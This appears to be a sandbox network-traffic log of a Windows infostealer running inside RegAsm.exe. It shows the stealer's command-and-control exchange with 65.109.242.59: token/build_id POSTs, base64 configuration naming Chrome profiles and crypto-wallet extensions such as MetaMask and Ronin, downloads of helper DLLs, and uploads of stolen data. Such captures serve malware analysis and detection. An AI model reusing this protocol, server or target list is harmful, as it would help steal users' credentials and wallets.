------AAKKFHCFIECAAAKEGCFI
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------
2024-05-24 15:46:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:46:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 15:46:59 UTC | 69 | IN
Data Ascii:
3a
1|1|1|0|22beda557d14ad082be10d5ca522c6ac|1|1|1|0|0|50000|0
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49713 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:46:59 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:46:59 UTC | 331 | OUT
Data Ascii:
------AAAAKJKJEBGHJKFHIDGC
Content-Disposition: form-data; name="token"

22beda557d14ad082be10d5ca522c6ac
------AAAAKJKJEBGHJKFHIDGC
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------AAAAKJKJEBGHJKFHIDGC
Cont
2024-05-24 15:47:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 15:47:00 UTC | 1564 | IN
                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49715 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:47:01 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:47:01 UTC | 331 | OUT
Data Ascii:
------FHJDBKJKFIECAAAKFBFB
Content-Disposition: form-data; name="token"

22beda557d14ad082be10d5ca522c6ac
------FHJDBKJKFIECAAAKFBFB
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------FHJDBKJKFIECAAAKFBFB
Cont
2024-05-24 15:47:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 15:47:02 UTC | 5605 | IN
                                                                                  Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49716 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:47:02 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:47:02 UTC | 332 | OUT
Data Ascii:
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="token"

22beda557d14ad082be10d5ca522c6ac
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------HJJJDAEGIDHCBFHJJJEG
Cont
2024-05-24 15:47:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 15:47:03 UTC | 119 | IN
                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.64971765.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:04 UTC279OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 7885
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:04 UTC7885OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------BAKEBAFIIECBGCAAAAFCCont
                                                                                  2024-05-24 15:47:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.6 | 49718 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:05 UTC | 194 | OUT | GET /sqls.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:05 UTC | 248 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:05 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2459136
                                                                                  Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                                  Connection: close
                                                                                  ETag: "6650696d-258600"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.6 | 49719 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:08 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 829
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:08 UTC | 829 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------CBAKFCBFHJDHJKECAKEHCont
                                                                                  2024-05-24 15:47:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.6 | 49721 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:09 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:09 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------GCFIIEBKEGHJJJJJJDAACont
                                                                                  2024-05-24 15:47:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.6 | 49722 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:10 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 437
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:10 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------FIEGCBKEGCFCBFIDBFIICont
                                                                                  2024-05-24 15:47:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.6 | 49723 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:12 UTC | 173 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:12 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:12 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 685392
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-a7550"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                  Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                  2024-05-24 15:47:12 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                  Data Ascii: 0<48%8A)$(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49727 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:47:14 UTC | 173 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-24 15:47:14 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:14 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49730 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:47:15 UTC | 174 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-24 15:47:16 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:16 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49731 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:47:17 UTC | 170 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-24 15:47:18 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:47:17 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.6 | 49732 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:20 UTC | 174 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:21 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:20 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 257872
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-3ef50"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.6 | 49733 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:22 UTC | 178 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:22 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:22 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 80880
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-13bf0"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.6 | 49734 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:23 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 1025
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:23 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HJJJDAEGIDHCBFHJJJEGCont
                                                                                  2024-05-24 15:47:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.6 | 49736 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:25 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
